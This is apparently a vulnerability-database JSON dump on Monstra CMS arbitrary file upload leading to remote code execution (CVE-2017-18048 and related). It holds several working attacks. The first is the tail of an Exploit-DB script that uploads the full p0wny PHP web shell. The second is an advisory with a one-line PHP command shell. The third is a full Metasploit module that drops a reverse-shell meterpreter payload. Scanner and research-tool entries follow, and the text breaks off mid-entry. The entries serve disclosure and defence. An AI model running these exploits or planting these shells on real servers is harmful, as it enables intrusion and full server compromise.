_insertCommand(eShellCmdInput.value);\\n _insertStdout(data.files.join(\\\"\\\\n\\\"));\\n }\\n }\\n\\n var currentCmd = eShellCmdInput.value.split(\\\" \\\");\\n var type = (currentCmd.length === 1) ? \\\"cmd\\\" : \\\"file\\\";\\n var fileName = (type === \\\"cmd\\\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\\n\\n makeRequest(\\n \\\"?feature=hint\\\",\\n {\\n filename: fileName,\\n cwd: CWD,\\n type: type\\n },\\n _requestCallback\\n );\\n\\n }\\n\\n function featureDownload(name, file) {\\n var element = document.createElement('a');\\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\\n element.setAttribute('download', name);\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.click();\\n document.body.removeChild(element);\\n _insertStdout('Done.');\\n }\\n\\n function featureUpload(path) {\\n var element = document.createElement('input');\\n element.setAttribute('type', 'file');\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.addEventListener('change', function () {\\n var promise = getBase64(element.files[0]);\\n promise.then(function (file) {\\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n });\\n }, function () {\\n _insertStdout('An unknown client-side error occurred.');\\n });\\n });\\n element.click();\\n document.body.removeChild(element);\\n }\\n\\n function getBase64(file, onLoadCallback) {\\n return new Promise(function(resolve, reject) {\\n var reader = new FileReader();\\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\\n reader.onerror = reject;\\n reader.readAsDataURL(file);\\n });\\n }\\n\\n function genPrompt(cwd) {\\n cwd = cwd || \\\"~\\\";\\n var shortCwd = cwd;\\n if (cwd.split(\\\"/\\\").length > 3) {\\n var splittedCwd = cwd.split(\\\"/\\\");\\n shortCwd = \\\"\\xe2\\x80\\xa6/\\\" + splittedCwd[splittedCwd.length-2] + \\\"/\\\" + splittedCwd[splittedCwd.length-1];\\n }\\n return \\\"p0wny@shell:<span title=\\\\\\\"\\\" + cwd + \\\"\\\\\\\">\\\" + shortCwd + \\\"</span>#\\\";\\n }\\n\\n function updateCwd(cwd) {\\n if (cwd) {\\n CWD = cwd;\\n _updatePrompt();\\n return;\\n }\\n makeRequest(\\\"?feature=pwd\\\", {}, function(response) {\\n CWD = response.cwd;\\n _updatePrompt();\\n });\\n\\n }\\n\\n function escapeHtml(string) {\\n return string\\n .replace(/&/g, \\\"&\\\")\\n .replace(/</g, \\\"<\\\")\\n .replace(/>/g, \\\">\\\");\\n }\\n\\n function _updatePrompt() {\\n var eShellPrompt = document.getElementById(\\\"shell-prompt\\\");\\n eShellPrompt.innerHTML = genPrompt(CWD);\\n }\\n\\n function _onShellCmdKeyDown(event) {\\n switch (event.key) {\\n case \\\"Enter\\\":\\n featureShell(eShellCmdInput.value);\\n insertToHistory(eShellCmdInput.value);\\n eShellCmdInput.value = \\\"\\\";\\n break;\\n case \\\"ArrowUp\\\":\\n if (historyPosition > 0) {\\n historyPosition--;\\n eShellCmdInput.blur();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n _defer(function() {\\n eShellCmdInput.focus();\\n });\\n }\\n break;\\n case \\\"ArrowDown\\\":\\n if (historyPosition >= commandHistory.length) {\\n break;\\n }\\n historyPosition++;\\n if (historyPosition === commandHistory.length) {\\n eShellCmdInput.value = \\\"\\\";\\n } else {\\n eShellCmdInput.blur();\\n eShellCmdInput.focus();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n }\\n break;\\n case 'Tab':\\n event.preventDefault();\\n featureHint();\\n break;\\n }\\n }\\n\\n function insertToHistory(cmd) {\\n commandHistory.push(cmd);\\n historyPosition = commandHistory.length;\\n }\\n\\n function makeRequest(url, params, callback) {\\n function getQueryString() {\\n var a = [];\\n for (var key in params) {\\n if (params.hasOwnProperty(key)) {\\n a.push(encodeURIComponent(key) + \\\"=\\\" + encodeURIComponent(params[key]));\\n }\\n }\\n return a.join(\\\"&\\\");\\n }\\n var xhr = new XMLHttpRequest();\\n xhr.open(\\\"POST\\\", url, true);\\n xhr.setRequestHeader(\\\"Content-Type\\\", \\\"application/x-www-form-urlencoded\\\");\\n xhr.onreadystatechange = function() {\\n if (xhr.readyState === 4 && xhr.status === 200) {\\n try {\\n var responseJson = JSON.parse(xhr.responseText);\\n callback(responseJson);\\n } catch (error) {\\n alert(\\\"Error while parsing response: \\\" + error);\\n }\\n }\\n };\\n xhr.send(getQueryString());\\n }\\n\\n document.onclick = function(event) {\\n event = event || window.event;\\n var selection = window.getSelection();\\n var target = event.target || event.srcElement;\\n\\n if (target.tagName === \\\"SELECT\\\") {\\n return;\\n }\\n\\n if (!selection.toString()) {\\n eShellCmdInput.focus();\\n }\\n };\\n\\n window.onload = function() {\\n eShellCmdInput = document.getElementById(\\\"shell-cmd\\\");\\n eShellContent = document.getElementById(\\\"shell-content\\\");\\n updateCwd();\\n eShellCmdInput.focus();\\n };\\n </script>\\n </head>\\n\\n <body>\\n <div id=\\\"shell\\\">\\n <pre id=\\\"shell-content\\\">\\n <div id=\\\"shell-logo\\\">\\n ___ ____ _ _ _ _ _ <span></span>\\n _ __ / _ \\\\__ ___ __ _ _ / __ \\\\ ___| |__ ___| | |_ /\\\\/|| || |_ <span></span>\\n| '_ \\\\| | | \\\\ \\\\ /\\\\ / / '_ \\\\| | | |/ / _` / __| '_ \\\\ / _ \\\\ | (_)/\\\\/_ .. _|<span></span>\\n| |_) | |_| |\\\\ V V /| | | | |_| | | (_| \\\\__ \\\\ | | | __/ | |_ |_ _|<span></span>\\n| .__/ \\\\___/ \\\\_/\\\\_/ |_| |_|\\\\__, |\\\\ \\\\__,_|___/_| |_|\\\\___|_|_(_) |_||_| <span></span>\\n|_| |___/ \\\\____/ <span></span>\\n </div>\\n </pre>\\n <div id=\\\"shell-input\\\">\\n <label for=\\\"shell-cmd\\\" id=\\\"shell-prompt\\\" class=\\\"shell-prompt\\\">???</label>\\n <div>\\n <input id=\\\"shell-cmd\\\" name=\\\"cmd\\\" onkeydown=\\\"_onShellCmdKeyDown(event)\\\"/>\\n </div>\\n </div>\\n </div>\\n </body>\\n\\n</html>\\n\\r\\n-----------------------------27822155982314896762160847658\\r\\nContent-Disposition: form-data; name=\\\"upload_file\\\"\\r\\n\\r\\nUpload\\r\\n-----------------------------27822155982314896762160847658--\\r\\n\"\r\n\r\n# Exploit:\r\nx = requests.post(url, headers=header, cookies=cookies, data=burp0_data)\r\n\r\n# Finish:\r\nprint('')\r\nprint('Please login in your webrowser and then open the following URL:')\r\nprint('File uploaded to: http://' + target_ip + ':' + target_port + Monstracms_path + 'public/uplaods/shell.phar')\r\nprint('')", "sourceHref": "https://www.exploit-db.com/raw/49949", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2018-02-15T16:54:47", "description": "Monstra CMS - Remote Code Execution. CVE-2017-18048. Webapps exploit for PHP platform", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-06T00:00:00", "type": "exploitdb", "title": "Monstra CMS - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18048"], "modified": "2017-12-06T00:00:00", "id": "EDB-ID:44045", "href": "https://www.exploit-db.com/exploits/44045/", "sourceData": "## Vulnerabilities Summary\r\nThe following advisory describes a vulnerability found in Monstra CMS.\r\n\r\nMonstra is \u201ca modern and lightweight Content Management System. It is Easy to install, upgrade and use.\u201d\r\n\r\nThe vulnerability found is a remote code execution vulnerability through an arbitrary file upload mechanism.\r\n\r\n## Credit\r\nAn independent security researcher, Ishaq Mohammed, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n\r\n## Vendor response\r\nWe were not able to get the vendor to respond in any way, the software appears to have been left abandoned without support \u2013 though this is not an official status on their site (last official patch was released on 2012-11-29), the github appears a bit more active (last commit from 2 years ago).\r\n\r\nWithout any vendor response the researcher was kind enough to create a patch that addresses this bug, its available here: https://github.com/monstra-cms/monstra/issues/426\r\n\r\nCVE: CVE-2017-18048\r\n\r\n## Vulnerabilities details\r\nAn editor can upload files to the Monstra CMS and can access them by clicking on them from the administrator portal. The default setup of Monstra CMS allows uploading of files only with certain extensions, forbidding all types of executable files which are mentioned in monstra\\plugins\\box\\filesmanager\\filesmanager.admin.php. However by simply uploading a php file with \u201cPHP\u201d (all characters in uppercase) extension will bypass this mechanism and will allow an attacker to execute shell commands on the server.\r\n\r\n## Proof of Concept\r\n\r\nSteps to Reproduce:\r\n\r\nLogin with a valid credentials of an Editor\r\nSelect Files option from the Dropdown menu of Content\r\nUpload a file with PHP (uppercase)extenstion contaiing the below code:\r\n\r\n```\r\n <?php\r\n $cmd=$_GET['cmd'];\r\n system($cmd);\r\n ?>\r\n```\r\nClick on Upload\r\n\r\nliOnce the file is uploaded Click on the uploaded file and add ?cmd= to the URL followed by a system command such as whoami,time,date etc.", "sourceHref": "https://www.exploit-db.com/download/44045/", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-07-11T09:34:57", "description": "", "cvss3": {}, "published": "2018-07-11T00:00:00", "type": "packetstorm", "title": "Monstra CMS Authenticated Arbitrary File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-18048"], "modified": "2018-07-11T00:00:00", "id": "PACKETSTORM:148487", "href": "https://packetstormsecurity.com/files/148487/Monstra-CMS-Authenticated-Arbitrary-File-Upload.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Monstra CMS Authenticated Arbitrary File Upload', \n'Description' => %q{ \nMonstraCMS 3.0.4 allows users to upload Arbitrary files which leads to remote command execution on the remote server. \nAn attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file. \nThis module was tested against MonstraCMS 3.0.4. \n}, \n \n'Author' => \n[ \n'Ishaq Mohammed <shaikhishaq201@gmail.com>', # Discoverer & Proof of Concept \n'Touhid M.Shaikh <touhidshaikh22@gmail.com>', # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE','2017-18048'], \n['EDB','43348'], \n['URL','https://blogs.securiteam.com/index.php/archives/3559'], \n['URL','https://securityprince.blogspot.com/2017/12/monstra-cms-304-arbitrary-file-upload.html?m=1'], \n['URL','https://www.youtube.com/watch?v=-ziZ6DELbzw'] \n], \n'DefaultOptions' => \n{ \n'PAYLOAD' => 'php/meterpreter/reverse_tcp', \n'Encoder' => 'php/base64' \n}, \n'Privileged' => false, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n['Monstra CMS 3.0.4', { }], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Dec 18 2017')) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"Base Monstra CMS directory path\", '/']), \nOptString.new('USERNAME', [ true, \"Username to authenticate with\", '']), \nOptString.new('PASSWORD', [ true, \"Password to authenticate with\", '']) \n]) \nend \n \ndef check \nbegin \nres = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'admin', 'index.php') }) \nrescue \nvprint_error(\"Unable to access the index.php file\") \nreturn CheckCode::Unknown \nend \n \nif res and res.code != 200 \nvprint_error(\"Error accessing the index.php file\") \nreturn CheckCode::Unknown \nend \n \nif res.body =~ /<\\/a>.*?Version (\\d+\\.\\d+\\.\\d+)/i \nversion = Gem::Version.new($1) \nvulnVersion = Gem::Version.new('3.0.4') \nvprint_status(\"Monstra CMS: #{version}\") \n \nif version > vulnVersion \nreturn CheckCode::Safe \nelsif version == vulnVersion \nreturn CheckCode::Appears \nelsif version < vulnVersion \nreturn CheckCode::Detected \nend \nend \nend \n \ndef uri \ntarget_uri.path \nend \n \ndef login \nres = nil \nvprint_status('Trying to Login ......') \n# Send Creds with cookies. \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(uri, 'admin', 'index.php'), \n'vars_post' => { \n'login' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'], \n'login_submit' => 'Log+In' \n} \n}) \ncookies = res.get_cookies \n \nfail_with(Failure::Unreachable, \"#{peer} - Did not respond to Login request\") if res.nil? \n \n# Try to access index page with authenticated cookie. \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(uri, 'admin' '/index.php'), \n'cookie' => cookies \n}) \nfail_with(Failure::Unreachable, \"#{peer} - Did not respond to Login request\") if res.nil? \n \n# if we redirect to core_welcome then we assume we have authenticated cookie. \nif res.code == 302 && res.headers['Location'].include?('index.php?id=dashboard') \nprint_good(\"Authentication successful : [ #{datastore['USERNAME']} : #{datastore['PASSWORD']} ]\") \nstore_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD']) \nreturn cookies \nelse \nfail_with(Failure::Unreachable, \"#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]\") \nend \nend \n \ndef exploit \n#Login Function Execute and Return Cookies \ncookies = login \n \n#Random payload name. \npay_name = \"#{rand_text_alpha(5..10)}.PHP\" \n \n \n# Payload Gen. \nevilbyte = \"<?php #{payload.encoded}; ?>\" \n \n# Request for CSRF token for file upload. \nres = send_request_cgi({ \n'uri' => normalize_uri(uri, 'admin', '/index.php'), \n'vars_get' => {'id' => 'filesmanager'}, \n'method' => 'GET', \n'cookie' => cookies \n}) \n \n# Grabbing CSRF token from body \n/<input type=\"hidden\" id=\"csrf\" name=\"csrf\" value=\"(?<csrf>[a-z0-9\"]+)\">/ =~ res.body \nfail_with(Failure::Unreachable, \"#{peer} - Could not determine CSRF token\") if csrf.nil? \nvprint_good(\"CSRF-Token for File Upload : #{csrf}\") \n \n# setup POST request. \npost_data = Rex::MIME::Message.new \npost_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name=\"csrf\"') # CSRF token #form-data; name=\"file\"; filename=\"agent22.PHP\" \npost_data.add_part(\"#{evilbyte}\", content_type = 'application/x-php', transfer_encoding = nil, content_disposition = \"form-data; name=\\\"file\\\"; filename=\\\"#{pay_name}\\\"\") # payload \npost_data.add_part(\"Upload\", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name=\"upload_file\"') # extra \ndata = post_data.to_s \n \nvprint_status(\"Trying to upload file #{pay_name} with malicious content....\") \n# Lets Send Upload request. \nres = send_request_cgi({ \n'uri' => normalize_uri(uri, 'admin', '/index.php'), \n'vars_get' => {'id' => 'filesmanager'}, \n'method' => 'POST', \n'cookie' => cookies, \n'Connection' => 'close', \n'data' => data, \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\" \n}) \n \n# Cleanup delete payload after get meterpreter. \nregister_files_for_cleanup(pay_name) \n \n \n# Execute our payload simply call to payload. \nprint_status(\"Executing Payload \" ) \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(uri, 'public', 'uploads', pay_name) \n}) \n \nend \nend \n`\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148487/monstra_fileupload_exec.rb.txt"}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:45", "description": "p0wny Shell is a PHP shell. An attacker might use this shell to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-10-19T00:00:00", "type": "checkpoint_advisories", "title": "p0wny Shell Remote Code Execution (CVE-2017-9830; CVE-2018-15139; CVE-2018-19423; CVE-2018-6383; CVE-2020-29607; CVE-2021-24155; CVE-2021-24347)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9830", "CVE-2018-15139", "CVE-2018-19423", "CVE-2018-6383", "CVE-2020-29607", "CVE-2021-24155", "CVE-2021-24347"], "modified": "2021-10-19T00:00:00", "id": "CPAI-2021-0765", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2023-12-07T16:49:54", "description": "[![](https://blogger.googleusercontent.com/img/a/AVvXsEhqamkOtMsV-aRAr4_S9CfR5DGaxCzwhGuVGrbw2PCFmAHQzWsLeYRCZRLhO3sWirSajYzf3r1g-RluL3zxSIBwQzfQysM7hYs00ZSJ_KacbMvljgwgjIeCR71e0O_GixRKuC0gmHPHjKpFtpkbouiwLVpkz7qmdTWxYrTjwwGrxuOpgWPGT8HO348H-Q=w640-h340)](<https://blogger.googleusercontent.com/img/a/AVvXsEhqamkOtMsV-aRAr4_S9CfR5DGaxCzwhGuVGrbw2PCFmAHQzWsLeYRCZRLhO3sWirSajYzf3r1g-RluL3zxSIBwQzfQysM7hYs00ZSJ_KacbMvljgwgjIeCR71e0O_GixRKuC0gmHPHjKpFtpkbouiwLVpkz7qmdTWxYrTjwwGrxuOpgWPGT8HO348H-Q=s755>)\n\n \n\n\nFUSE is a [penetration testing](<https://www.kitploit.com/search/label/Penetration%20Testing> \"penetration testing\" ) system designed to identify Unrestricted Executable File Upload (UEFU) vulnerabilities. The details of the testing strategy is in our [paper](<https://wsp-lab.github.io/papers/lee-fuse-ndss20.pdf> \"paper\" ), \"FUSE: Finding File Upload Bugs via Penetration Testing\", which appeared in NDSS 2020. To see how to configure and execute FUSE, see the followings.\n\n \n\n\n**Setup** \n \n**Install** \n\n\nFUSE currently works on Ubuntu 18.04 and Python 2.7.15.\n\n 1. Install dependencies\n \n \n # apt-get install rabbitmq-server \n # apt-get install python-pip \n # apt-get install git \n \n\n 2. Clone and build FUSE\n \n \n $ git clone https://github.com/WSP-LAB/FUSE \n $ cd FUSE && pip install -r requirements.txt \n \n\n * If you plan to leverage [headless](<https://www.kitploit.com/search/label/Headless> \"headless\" ) browser verification using selenium, please install Chrome and Firefox web driver by refering [selenium document](<https://selenium.dev/selenium/docs/api/py/index.html> \"selenium document\" ).\n \n**Usage** \n \n**Configuration** \n\n\n * FUSE uses a user-provided [configuration file](<https://github.com/WSP-LAB/FUSE/blob/master/configs/default-credential.conf> \"configuration file\" ) that specifies parameters for a target PHP application. The script must be filled out before testing a target Web application. You can check out [README](<https://github.com/WSP-LAB/FUSE/blob/master/configs/README.md> \"README\" ) file and [example configuration files](<https://github.com/WSP-LAB/FUSE/blob/master/configs> \"example configuration files\" ).\n\n * Configuration for File Monitor (Optional)\n \n \n $ vim filemonitor.py \n \n ... \n 10 MONITOR_PATH='/var/www/html/' <- Web root of the target application \n 11 MONITOR_PORT=20174 <- Default port of File Monitor \n 12 EVENT_LIST_LIMITATION=8000 <- Maxium number of elements in EVENT_LIST \n ... \n \n\n \n**Execution** \n\n\n * FUSE\n \n \n $ python framework.py [Path of configuration file] \n \n\n * File Monitor\n \n \n $ python filemonitor.py \n \n\n * Result \n * When FUSE completes the penetration testing, a [HOST] directory and a [HOST_report.txt] file are created.\n * A [HOST] folder stores files that have been attempted to upload.\n * A [HOST_report.txt] file contains test results and information related to files that trigger U(E)FU.\n \n**CVEs** \n\n\nIf you find UFU and UEFU bugs and get CVEs by running FUSE, please send a PR for [README.md](<https://github.com/WSP-LAB/FUSE/blob/master/README.md> \"README.md\" )\n\nApplication | CVEs \n---|--- \nElgg | CVE-2018-19172 \nECCube3 | CVE-2018-18637 \nCMSMadeSimple | CVE-2018-19419, CVE-2018-18574 \nCMSimple | CVE-2018-19062 \nConcrete5 | CVE-2018-19146 \nGetSimpleCMS | CVE-2018-19420, CVE-2018-19421 \nSubrion | CVE-2018-19422 \nOsCommerce2 | CVE-2018-18572, CVE-2018-18964, CVE-2018-18965, CVE-2018-18966 \nMonstra | CVE-2018-6383, CVE-2018-18694 \nXE | XEVE-2019-001 \n \n**Author** \n\n\nThis [research project](<https://www.kitploit.com/search/label/Research%20Project> \"research project\" ) has been conducted by [WSP Lab](<https://wsp-lab.github.io> \"WSP Lab\" ) at KAIST.\n\n * Taekjin Lee\n * [Seongil Wi](<https://seongil-wi.github.io/> \"Seongil Wi\" )\n * [Suyoung Lee](<https://leeswimming.com/> \"Suyoung Lee\" )\n * [Sooel Son](<https://sites.google.com/site/ssonkaist/home> \"Sooel Son\" )\n \n**Citing FUSE** \n\n\nTo cite our paper:\n\nDistributed System Security Symposium}, year = 2020 } \">\n \n \n @INPROCEEDINGS{lee:ndss:2020, \n author = {Taekjin Lee and Seongil Wi and Suyoung Lee and Sooel Son}, \n title = {{FUSE}: Finding File Upload Bugs via Penetration Testing}, \n booktitle = {Proceedings of the Network and Distributed System Security Symposium}, \n year = 2020 \n } \n \n\n \n \n\n\n**[Download FUSE](<https://github.com/WSP-LAB/FUSE> \"Download FUSE\" )**\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-10T20:30:00", "type": "kitploit", "title": "FUSE - A Penetration Testing Tool For Finding File Upload Bugs", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-18572", "CVE-2018-18574", "CVE-2018-18637", "CVE-2018-18694", "CVE-2018-18964", "CVE-2018-18965", "CVE-2018-18966", "CVE-2018-19062", "CVE-2018-19146", "CVE-2018-19172", "CVE-2018-19419", "CVE-2018-19420", "CVE-2018-19421", "CVE-2018-19422", "CVE-2018-6383"], "modified": "2021-10-10T20:30:00", "id": "KITPLOIT:796948219352081870", "href": "http://www.kitploit.com/2021/10/fuse-penetration-testing-tool-for.html", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-05-27T18:37:31", "description": "Monstra CMS is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-05-29T00:00:00", "type": "openvas", "title": "Monstra CMS <= 3.0.4 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17418", "CVE-2018-16608", "CVE-2018-18048", "CVE-2018-9037", "CVE-2018-17026", "CVE-2018-18694", "CVE-2020-13384", "CVE-2018-17025", "CVE-2018-14922", "CVE-2018-11474", "CVE-2018-16819", "CVE-2018-10121", "CVE-2020-8439", "CVE-2018-16977", "CVE-2018-15886", "CVE-2018-17024", "CVE-2018-11473", "CVE-2018-11678", "CVE-2018-16979", "CVE-2018-11475", "CVE-2018-6383", "CVE-2018-11227", "CVE-2018-9038", "CVE-2018-10109", "CVE-2018-11472", "CVE-2018-16820", "CVE-2018-16978", "CVE-2018-10118", "CVE-2018-6550"], "modified": "2020-05-25T00:00:00", "id": "OPENVAS:1361412562310113204", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113204", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Monstra CMS <= 3.0.4 Multiple Vulnerabilities\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113204\");\n script_version(\"2020-05-25T08:57:27+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-25 08:57:27 +0000 (Mon, 25 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-29 16:04:31 +0200 (Tue, 29 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_cve_id(\"CVE-2018-11472\", \"CVE-2018-11473\", \"CVE-2018-11474\", \"CVE-2018-11475\",\n \"CVE-2018-18048\", \"CVE-2018-6383\", \"CVE-2018-6550\", \"CVE-2018-9037\",\n \"CVE-2018-9038\", \"CVE-2018-10109\", \"CVE-2018-10118\", \"CVE-2018-10121\",\n \"CVE-2018-11678\", \"CVE-2018-17418\", \"CVE-2018-14922\", \"CVE-2018-16608\",\n \"CVE-2018-15886\", \"CVE-2018-17026\", \"CVE-2018-17024\", \"CVE-2018-17025\",\n \"CVE-2018-16979\", \"CVE-2018-16977\", \"CVE-2018-16978\", \"CVE-2018-16819\",\n \"CVE-2018-18694\", \"CVE-2018-16820\", \"CVE-2018-11227\", \"CVE-2020-8439\",\n \"CVE-2020-13384\");\n\n script_name(\"Monstra CMS <= 3.0.4 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_monstra_cms_detect.nasl\");\n script_mandatory_keys(\"monstra_cms/detected\");\n\n script_tag(name:\"summary\", value:\"Monstra CMS is prone to multiple vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - Reflected XSS during Login\n\n - XSS in the registration Form\n\n - A password change at admin/index.php?id=users&action=edit&user_id=1 or users/1/edit does not invalidate a session that is open in a different browser\n\n - Arbitrary file upload vulnerability for example because .php (lowercase) is blocked but .PHP (uppercase) is not\n\n - Monstra CMS has an incomplete 'forbidden types' list that excludes .php (and similar) file extensions\n but not the .pht or .phar extension, which leads to arbitrary file upload.\n\n - XSS in the title function in plugins/box/pages/pages.plugin.php via a page title to admin/index.php\n\n - RCE via an upload_file request for a .zip file, which is automatically extracted and may contain .php files.\n\n - File deletion vulnerability via an admin/index.php?id=filesmanager&delete_dir=./&path=uploads/ request\n\n - Stored XSS vulnerability when an attacker has access to the editor role,\n and enters the payload in the content section of a new page in the blog catalog.\n\n - Stored XSS via the Name field on the Create New Page screen under the admin/index.php?id=pages URI\n\n - Stored XSS vulnerability in plugins/box/pages.admin.php when an attacker has access to the editor role,\n and enters the payload in the title section of an admin/index.php?id.pages&action.edit_page&name.error404 action.\n\n - plugins/box/users/users.plugin.php allows Login Rate Limiting Bypass via manipulation of the login_attempts cookie.\n\n - Multiple XSS vulnerabilities via the first name or last name field in the edit profile page.\n\n - An attacker with 'Editor' privileges can change the password of the administrator via an Insecure 